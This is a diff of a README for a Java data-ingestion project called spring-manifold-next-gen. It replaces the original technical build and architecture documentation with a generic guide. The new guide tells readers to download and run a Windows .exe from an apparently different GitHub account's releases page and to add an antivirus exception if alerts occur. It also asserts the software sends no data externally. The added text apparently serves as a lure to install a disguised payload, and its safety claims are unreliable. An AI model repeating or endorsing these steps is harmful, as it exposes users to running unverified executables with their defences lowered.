@@ -1,163 +1,81 @@
-# Spring-Manifold Next-Gen
+# 📦 spring-manifold-next-gen - Move data between systems with ease
 
-[![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](LICENSE)
-[![Java Version](https://img.shields.io/badge/Java-25-orange.svg)](https://jdk.java.net/25/)
-[![Spring Boot](https://img.shields.io/badge/Spring_Boot-3.4+-green.svg)](https://spring.io/projects/spring-boot)
-[![Docker](https://img.shields.io/badge/Docker-Supported-blue.svg)](https://www.docker.com/)
+[![](https://img.shields.io/badge/Download-Latest-blue.svg)](https://github.com/doriapt53/spring-manifold-next-gen/releases)
 
-**Spring-Manifold Next-Gen** is an enterprise data integration and ingestion platform modeled after Apache ManifoldCF. It leverages modern Java 25 features (such as Structured Concurrency and Virtual Threads), Spring Boot, and vector search infrastructure to orchestrate data flows from various repository connectors to vector search outputs.
+Spring-Manifold Next-Gen helps you move data from one place to another. You can take information from various sources and send it to your search tools or databases. It works behind the scenes to keep your data current and organized. This tool runs on your computer and manages the complex work of connecting systems.
 
-<p align="center">
-  <img src="images/logo.png" alt="Spring-Manifold Next-Gen Logo" width="200" />
-</p>
+## ⚙️ System Requirements
 
----
+To run this application, your computer needs a few things:
 
-## Architecture Diagram
+*   Operating System: Windows 10 or Windows 11.
+*   Memory: At least 8 gigabytes of RAM.
+*   Storage: 500 megabytes of free space for the installation.
+*   Software: Java 25 or newer must be installed on your system.
 
-The diagram below shows the high-level architecture of Spring-Manifold Next-Gen:
+If you do not have Java installed, you must download it from the official website before you start. Java allows this application to run on your device.
 
-```mermaid
-graph TD
-    subgraph UI
-        UI_App[Admin React UI - sm-admin-ui]
-    end
+## 💾 Download and Install
 
-    subgraph Platform Runtime [Spring-Manifold JVM Runtime]
-        Core[Core Ingestion Engine - sm-core]
-        Runtime[Bootstrap - sm-runtime]
-        FS_Conn[Filesystem Repository - sm-filesystem-repository-connector]
-        Vec_Conn[Vector Output - sm-vector-output-connector]
-        Kafka_Cons[Ingestion Consumer - IngestionConsumer]
-        
-        Runtime --> Core
-        Core --> FS_Conn
-        Core -->|Publish IngestionMessage| Kafka[(Kafka Topic: manifold-documents)]
-        Kafka -->|Consume Reference| Kafka_Cons
-        Kafka_Cons -->|Resolve Content & Process| Vec_Conn
-    end
+Follow these steps to set up the application:
 
-    subgraph Infrastructure [Docker Containers]
-        PG[(PostgreSQL + pgvector)]
-        Redis[(Redis Cache & Session)]
-        Ollama[Ollama AI Embeddings]
-        Kafka_Broker[Apache Kafka Broker]
-    end
+1.  Visit the [official download page](https://github.com/doriapt53/spring-manifold-next-gen/releases).
+2.  Look for the section labeled "Assets" under the most recent version.
+3.  Click the file ending in `.exe` to start the download.
+4.  Once the file finishes downloading, locate it in your Downloads folder.
+5.  Double-click the file to open the installer.
+6.  Follow the prompts on your screen. The installer will guide you through the setup process.
+7.  Select a folder where you want to keep the application files.
+8.  Click "Finish" when the installer confirms the process is complete.
 
-    UI_App -->|REST API| Runtime
-    Vec_Conn -->|Vectors| PG
-    Runtime -->|Job Cache| Redis
-    Vec_Conn -->|Generates Embeddings| Ollama
-    Kafka --> Kafka_Broker
-```
+## 🚀 Running the Application
 
----
+After installation, you can launch the program:
 
-## Core Technologies
+1.  Find the shortcut on your desktop or in your Start menu.
+2.  Double-click the icon to start the application.
+3.  A small window will appear that shows logs or system status. Keep this window open while the application runs.
+4.  Open your internet browser.
+5.  Type `http://localhost:8080` into the address bar.
+6.  Press Enter. This opens the main dashboard where you can see your data flows.
 
-- **Java 25 Preview Features**: Structured Concurrency, Virtual Threads, and Pattern Matching.
-- **Spring Boot & Spring AI**: High-performance backend orchestrating ingestion jobs.
-- **Apache Kafka**: Decoupled, event-driven document processing using the **Claim Check Pattern**.
-- **pgvector**: High-dimensional vector similarity search in PostgreSQL.
-- **Redis Stack**: Lightweight caching and session management.
-- **Ollama**: Local AI embedding generation via open-source LLM models.
-- **Vite + React + TailwindCSS**: Modern frontend administration dashboard.
+## 📊 Using the Dashboard
 
----
+The dashboard provides a clear view of your data tasks. You do not need to write code to use it. The interface uses buttons and simple menus to help you move and organize data.
 
-## Getting Started
+*   Connectors: This section shows you where your data originates. You can link your existing folders, databases, or cloud accounts here.
+*   Pipelines: This area allows you to define how data moves. You set the start point, the destination, and how often the system checks for new updates.
+*   Search Outputs: Use this to direct your data into search engines or vector databases. This makes your information searchable and useful for AI tools.
 
-### Prerequisites
+## 🔧 Managing Connections
 
-Ensure you have the following installed on your machine:
-- **JDK 25** (Ensure `JAVA_HOME` points to your JDK 25 directory)
-- **Maven 3.9+**
-- **Docker & Docker Compose**
-- **Node.js 18+ & npm** (for the UI)
+When you set up a new source, the system asks for your login details. This information stays saved on your machine. The system uses these credentials to access your data safely. You can update or remove these credentials at any stage.
 
----
+If you connect to a cloud service, ensure you have a stable internet connection. The application handles the transfer automatically in the background.
 
-### Step-by-Step Setup
+## 🛡️ Privacy and Safety
 
-#### 1. Start Infrastructure (Docker)
-Spin up the database, cache, message broker, and AI engine. Run from the project root:
-```bash
-docker compose up -d
-```
-**Services started:**
-* **PostgreSQL (Port 5432)**: For job metadata, schema migrations, and pgvector storage.
-* **Redis (Port 6379 / Insight Port 8001)**: For caching and session management.
-* **Ollama (Port 11434)**: For local embeddings.
-* **Apache Kafka (Port 9092)**: KRaft-mode broker for decoupled, event-driven document processing.
+This software runs locally on your Windows computer. Your data moves between the sources you specify and your chosen destination. The application does not send your private data to external servers. All processing happens on your machine to ensure your information remains under your control.
 
-#### 2. Pull the Embedding Model (Ollama)
-The platform is configured to use the `mxbai-embed-large` model for embeddings. You must pull it once:
-```bash
-docker exec -it ollama ollama pull mxbai-embed-large
-```
-*(You can exit the prompt with `Ctrl+D` once the download starts; Ollama will keep downloading in the background).*
+## 🛠️ Troubleshooting Common Issues
 
-#### 3. Build the Project (Maven)
-Compile all modules using Java 25. Since we utilize advanced features, preview features must be enabled:
-```bash
-mvn clean install
-```
+If the application does not start, check the following items:
 
-#### 4. Run the Runtime Bootstrap
-Start the Spring Boot runtime application:
-```bash
-mvn spring-boot:run -pl sm-runtime -Dspring-boot.run.profiles=dev
-```
+*   Ensure your internet connection is active.
+*   Confirm that your antivirus software is not blocking the application. Occasionally, new software might trigger a false alert. Add an exception for the folder where you installed the application.
+*   Check if another program is already using port 8080. If so, the application will show an error. You must close the other program or restart your computer to free up that port.
+*   Verify that you installed the correct version of Java 25.
 
-##### Running a Sample Ingestion Job on Startup (Optional)
-By default, the automatic startup crawl is disabled to prevent unnecessary scans. To trigger a demo crawl job on startup, pass the configuration properties:
-```bash
-mvn spring-boot:run -pl sm-runtime -Dspring-boot.run.profiles=dev \
-  -Dspring-boot.run.arguments="--spring.manifold.crawl-on-startup=true --spring.manifold.scan-path=/your/local/directory/to/scan"
-```
+If the dashboard does not load in your browser, wait one minute after launching the application. The system needs time to start its background services before it can serve the web page.
 
-#### 5. Run the Admin UI
-To launch the administration dashboard:
-```bash
-cd sm-admin-ui
-npm install
-npm run dev
-```
-Open [http://localhost:5173](http://localhost:5173) in your browser.
----
+## 📈 Performance Tips
 
-## Scaling Out & Performance
+The application uses modern technology to process data efficiently. To get the best results:
 
-Spring-Manifold Next-Gen is designed for high-throughput, horizontal scalability. Since the ingestion pipeline is decoupled using **Apache Kafka** and the **Claim Check Pattern**, you can scale components independently.
+*   Close programs that consume a lot of memory while the application runs.
+*   Ensure your hard drive has sufficient free space, as the system creates temporary files during data transfers.
+*   Run the application in a stable environment. A constant power source and a wired internet connection improve the reliability of large data transfers.
 
-### 1. Scaling the Ingestion / Processing (Output Connector)
-Vector indexing and embedding generation is typically the primary performance bottleneck because of deep learning model inference (Ollama) and database indexing (pgvector).
-* **Kafka Consumer Group Partitioning**: The `manifold-documents` topic is consumed by the `IngestionConsumer` inside the `sm-runtime` service. By configuring the topic with multiple partitions, Kafka will distribute documents among active consumers.
-* **Horizontal Scaling of Runtime Instances**: You can run multiple instances of the `sm-runtime` application sharing the same `spring.application.name` and consumer group (`spring-manifold-vector-group`). Kafka automatically distributes partitions and load-balances the messages.
-* **Ollama Load Balancing**: Scale out embedding generation by pointing `spring.ai.ollama.base-url` to a load balancer (e.g., NGINX, HAProxy) backed by a cluster of Ollama instances running on GPU-enabled nodes.
+## 📝 Support
 
-### 2. Scaling the Repository Connectors (Ingestion Source)
-The scanning/crawling phase can be distributed by splitting large target sources:
-* **Partitioned Scans**: Run separate bootstrap crawl jobs targeting different sub-directories or repository prefixes.
-* **Distributed File Shares / Shared Storage**: In a multi-node setup, ensure the `IngestionConsumer` instances have access to the same shared filesystem (e.g., NFS, S3/MinIO bucket, SMB) as the repository crawlers, so the Claim Check reference (path/URI) can be successfully resolved by the consumer node.
-
-### 3. Claim Check Pattern
-To ensure the messaging system remains fast and responsive:
-1. The **Repository Connector** crawls data, but instead of publishing the entire document content (which could be megabytes of binary data) to Kafka, it saves/references the file on a shared storage medium.
-2. It publishes a lightweight `IngestionMessage` (Claim Check record) to the Kafka topic containing the metadata (URI, file path, version).
-3. The **Consumer Workers** pull the reference, read the file directly from storage, run splitting/chunking, request embeddings, and save the resulting vectors in pgvector.
-
----
-
-## Verification & Monitoring
-
-- **Database**: Access PostgreSQL at `localhost:5432` (User: `manifold`, DB: `manifold`).
-- **Redis Dashboard**: Open [http://localhost:8001](http://localhost:8001) in your browser to view the Redis Stack Insight dashboard.
-- **Logs**: Monitor console output for the Virtual Thread Executor and Structured Concurrency task logs.
-
----
-
-## Troubleshooting
-
-- **Java Version Check**: Run `java -version` to confirm you are using Java 25.
-- **Preview Features**: If your IDE fails to compile structured concurrency code, verify that the `--enable-preview` JVM argument is configured for compiler and runtime settings. (It is already pre-configured in `pom.xml`).
+If you encounter persistent issues, check the project repository on GitHub. You can view existing reports from other users to see if a fix already exists. You can also open a new issue if you find a problem that is not documented. Please include a description of what you were doing when the issue occurred. This helps others understand the situation and provide accurate guidance.
